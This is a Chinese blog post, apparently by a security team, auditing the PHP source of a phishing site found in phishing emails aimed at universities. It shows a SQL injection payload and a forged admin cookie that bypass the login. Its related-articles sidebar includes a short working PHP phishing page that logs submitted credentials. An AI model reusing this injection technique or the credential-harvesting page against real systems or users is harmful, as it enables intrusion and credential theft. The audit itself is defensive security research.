钓鱼网站php,偶遇钓鱼网站的一次代码审计

最新推荐文章于 2023-05-19 17:17:29 发布
最新推荐文章于 2023-05-19 17:17:29 发布
阅读量995 收藏 7
点赞数
文章标签: 钓鱼网站php

偶遇一个钓鱼邮件中的钓鱼网站,并与年华大佬做了代码审计。据说近期全国出现多起钓鱼邮件事件,主要以各大高校为主,已有不少人上当,还需多加注意。

分析钓鱼网站

be6462d5f608388e1afb5b2767b052be.png 钓鱼网站采用常用空间钓鱼CMS搭建,可通过百度搜索下载源码。

源码

d02273b1d7ddd5e5e16a5c5dfe99e53d.png

40ba8705f0ece6bb331669951caa1429.png

43922733869e4d48f8fc0284f8db688d.png

7e306186d718f693fec66e4657853777.png

观察源码发现,源码中存在360safe防护机制,无法通过正常方式进行攻击。

分析

猜测钓鱼网站后台管理页面地址,发现地址为

65e113a7d4c28abe0f07a3bbe028bab3.png 无法知道用户名密码,分析源码,查看是否存在绕过。观察index.php页面

69d28cd2056797cd0c35018cab0f81c5.png

发现PHP代码,存在$islogin参数判断,如果$islogin==1,则进行下一步判断,否则跳出

跳转至login.php登陆页面

507ff9bd93b9fff7284cc920f5a04d8f.png

发现index.php页面中引入include参数,传递$islogin参数,查看/include/common.php,找到并打开common.php页面

748edef466b8bb9e56d8b96c9aad2b1a.png

从中发现define(LOGIN_KEY,abchdbb768541)加密密钥从中发现/config.php配置文件以及member.php文件分别对两个文件进行观察

config.php并无有效信息

62d96ed1f9a39156cbcecdfa61921cf2.png

member.php中发现登陆查询数据库逻辑关系

6560807dbc2de6160b92583662405c8a.png

密码判断

首先判断cookie中是否存在islogin参数,如果不存在,则跳出。

如果存在,则对cookie中的admin_user进行base64解码,然后在 fish_admin表中查询并将返回结果赋值给$udata在进行判断.

如果$udata中username值为空,则将cookie中islogin、admin_user、admin_pass赋值为空,跳出登陆。

如果不为空,则继续进行判断,

对$admin_pass进行加密处理。首先拼接数据库查询返回值中的password与LOGIN_KEY也就是刚刚在common.php中查看到的加密密钥。

进行拼接后,再进行sha1加密。

如果$admin_pass加密后的值与cookie中传递的admin_pass的值相同,则$islogin=1,完成登陆,否则islogin、admin_user、admin_pass赋值为空,跳出登陆。

用户名判断

对$_SESSION中的islogin进行判断,如果存在,则判断$_SESSION中admin_user的值。

首先进行base64解码,然后在数据库中fish_admin表中查询,如果cookie中携带的$admin_pass与加密后的密码一致,则返回$islogin=1完成登陆。

登陆绕过

分析过登陆逻辑之后,对登陆继续绕过,到达可以绕过登陆,进入后台。

首先,因为index.php页面中会判断cookie中是否存在islogin=1,所以cookie中需要存在islogin=1

所以,第一个内容为cookie:islogin=1;

接下来判断admin_user。

在member.php页面中发现,SQL语句进行查询是未进行过滤,而是直接拼接,使用传递值。

所以可以通过构造内容' union select 1,2,3,'1',5,6#。

SQL语句拼接后便变成SELECT * FROM fish_admin WHERE username=' 'union select 1,2,'1',4,5,6#limit 1

在本地数据库中进行查询尝试,得到返回结果

76160ea5609df5310ac867e1c3f887ef.png

可以发现,查询中password返回值为1

拼接SQL语句中,使用'1'的原因为后面与LOGIN_KEY进行拼接时,需要使用字符串拼接,所以需要使用字符串进行拼接。

这时就会发现,返回值中的password也就是会被下一步的admin_pass进行接受并且拼接密钥进行sha1加密,并对cookie中的admin_pass进行匹配,如果一致,则会绕过登陆。

前一步拼接的SQL语句,使password返回值为1,则先对1与已经得到的LOGIN_KEY继续拼接,得到1abchdbb768541。

然后通过对拼接后的字符串进行sha1加密,得到05b2d871710e7871de3193152c978fa60052ec1d

4a76f32aaa10d2bfcc74c95866a795c4.png

将admin_user也就是' union select 1,2,'1',4,5,6#进行base64加密,得到JyB1bmlvbiBzZWxlY3QgMSwyLCcxJyw0LDUsNiM=

ccb5c5a73e10edeb08b79b7acb673830.png

然后将所有得到的信息写入cookie中。cookie:islogin=1;admin_user=JyB1bmlvbiBzZWxlY3QgMSwyLCcxJyw0LDUsNiM=;admin_pass=05b2d871710e7871de3193152c978fa60052ec1d;

然后携带cookie去访问后台页面,则可以直接绕过登陆,进入后台管理。

76abca9ed7f27a959aa69a2ba9c79814.png

1d7e14c39fe01cb2700ef8d08bedf347.png

9cae13436c20f78e91af11238af56d70.png

发现页面数据只显示一页内容,通过分析list.php页面,发现传递page参数,修改page参数可切换下一页。

d244a84fe9ea8565f56961dcebeef58b.png

本次偶遇钓鱼邮件,进入后台后并未对已记录账户信息的QQ进行登陆等操作。

关注我们

Tide安全团队正式成立于2019年1月,是以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防,网络安全,移动终端,安全开发,的IoT /物联网/工控安全等方向。想了解更多Tide安全团队,请关注团队官网:  http://www.TideSec.net或关注公众号:

鞠慧敏
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计】对另一套钓鱼网站代码审计
None安全团队
12-02 434
前言 之前有粉丝投稿过一篇对钓鱼网站代码审计,然后就有位老哥给我发了另一套还算比较新的钓鱼网站的源代码让我玩玩。源码收到后拖了好几天终于抽出一点时间来审计一下并记录此文。(打工人就是一块砖,哪里需要往哪里搬~) 钓鱼网站介绍 通过本地搭建该钓鱼网站,发现这是一个通过抓取转转交易网、猎趣交易网等页面的,伪造真实的商品购买页面进行钓鱼,受害人下单了但是钱却不是走官方平台交易,而是进了骗子的钱包,而受害者也不会真的收到购买的商品。 前台钓鱼页大概长这样~(随便生成了一个) ...
php钓鱼网站怎么做视频教程,反黑钓鱼网站全过程
weixin_26782929的博客
03-10 1183
一、被盗号找上门今天一打开QQ邮箱,看到个群邮件这货以发聚会照片为名义给出了一个网址Defaulthttp://202.194.131.20/xcb/xcb/link.php?id=73&url=http://yyhhj.emy.in/cc/?9330461http://202.194.131.20/xcb/xcb/link.php?id=73&url=http://yyhhj.e...
网络钓鱼网站代码
weixin_34050389的博客
06-29 1756
非常实用的网络钓鱼代码,PAYPAL网站。 转载于:https://blog.51cto.com/tombook/340665
2020最新版本交易猫钓鱼源码完整版zip
10-27
2020最新版本交易猫钓鱼源码完整版 数据库修改:config/Conn.php 然后导入数据库就行 后台账号admin 密码123456 仅供参考学习
飞鱼:我的新2021飞蝇钓鱼网站
02-11
这是一个用引导的项目。 入门 首先,运行开发服务器: npm run dev # or yarn dev 使用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 当您编辑文件时,页面会自动更新。 可以在上访问。 可以在pages/api/hello.js编辑此端点。 pages/api目录映射到/api/* 。 此目录中的文件被视为而不是React页面。 了解更多 要了解有关Next.js的更多信息,请查看以下资源: -了解Next.js功能和API。 交互式Next.js教程。 您可以查看-欢迎您提供反馈和意见! 在Vercel上部署 部署Next.js应用程序的最简单方法是使用Next.js创建者提供的。 查看我们的以了解更多详细信息。 飞鱼
户外钓鱼类网站模板是一款适合垂钓行业门户钓鱼网站模板下载.zip
02-21
户外钓鱼类网站模板是一款适合垂钓行业门户钓鱼网站模板下载.zip户外钓鱼类网站模板是一款适合垂钓行业门户钓鱼网站模板下载.zip
基于改进的TrustRank算法的钓鱼网站检测
01-19
钓鱼检测方式一般只是通过比较网页间特征的相似度判断...实验证明,改进的TrustRank算法可以将钓鱼网站的信任值集中在一个范围内,并且与其他方法相比具有较低的误判率、漏判率和较高的速度,可以很好地检测钓鱼网站
校园网钓鱼网站.zip
最新发布
04-17
校园网钓鱼网站是一种网络诈骗手段,通过伪造校园官方网站或服务,诱骗学生输入个人信息,如用户名、密码、银行账户等。这类网站通常具有以下特点: 1. **伪装性**:网站外观与真实校园网非常相似,难以辨识。 2. **...
户外钓鱼类网站html模板.rar
01-10
具体页面可以查看我的文章——《html模板下载之“门户网站html模板页面下载”——html模板下载合集》。实训项目html模板下载,毕业设计html模板下载,户外钓鱼类网站模板是一款适合垂钓行业门户钓鱼网站模板下载.rar
蓝天白云户外钓鱼网站模板下载_蓝天 白云 户外 钓鱼 企业 蓝天 休闲.zip
02-19
蓝天白云户外钓鱼网站模板下载_蓝天 白云 户外 钓鱼 企业 蓝天 休闲.zip蓝天白云户外钓鱼网站模板下载_蓝天 白云 户外 钓鱼 企业 蓝天 休闲.zip
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
CS钓鱼网站实操
wutiangui的博客
05-19 294
使用火狐打开钓鱼网站,设置里选择更多攻击–web开发者工具调出网页代码,选择下图选取页面元素,点击登录,右键编辑。装完后选择内网连接进入,使用给出的用户名和密码登录。首先kali上用以下命令安装phpstudy。编辑替换后上传chaoxing.html。替换里面的onclick为真实点击代码。注意下图路径需先切换到wwwroot下。到kali的phpstudy中。
成功解决: 支付宝报错钓鱼网站
热门推荐
若尘的博客
08-03 5万+
支付宝报错钓鱼网站
玩一个钓鱼网站
zyxyzz的博客
05-23 9549
今天突然发现了一个好玩的钓鱼网站,只要你qq在线点击他的网址就会被盗号,http://url.cn/48ZHq3H?uuid=vRJnzhHTcG。 当你qq在线时,会自动登录,然后不断调转,初步估计和QQ的自动登录插件有关,接下去看看,虚拟机里没qq,点开。由web狗的嗅觉:https\x3A\x2F\x2Fui.ptlogin2.qq.com\x2Fcgi-bin\x2Flogin\x3Fs
使用php语言生成一个钓鱼网站
06-08
请注意,本回答仅限于学术研究和安全测试目的。钓鱼行为是违法的,不应该用于非法目的。 钓鱼网站是一种骗取用户个人信息的欺诈手段,通常被设计成与合法的网站相似,以欺骗用户点击链接或输入个人信息。以下是一个简单的使用 PHP 语言生成钓鱼网站的示例代码: ```php <?php if(isset($_POST['username']) && isset($_POST['password'])) { // 将用户输入的用户名和密码保存到文件中 $filename = 'log.txt'; $data = $_POST['username'] . '|' . $_POST['password'] . "\n"; file_put_contents($filename, $data, FILE_APPEND); // 跳转到真正的网站 header('Location: https://www.example.com'); exit(); } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Login</title> </head> <body> <form method="post"> <label>Username:</label> <input type="text" name="username"><br> <label>Password:</label> <input type="password" name="password"><br> <input type="submit" value="Login"> </form> </body> </html> ``` 上述代码会将用户输入的用户名和密码保存到 `log.txt` 文件中,并将用户重定向到真正的网站。攻击者可以利用这个文件来获取用户的个人信息。 请注意,这只是一个非常简单的示例,真正的钓鱼网站可能会更加复杂和危险。再次提醒,钓鱼行为是违法的,请勿用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值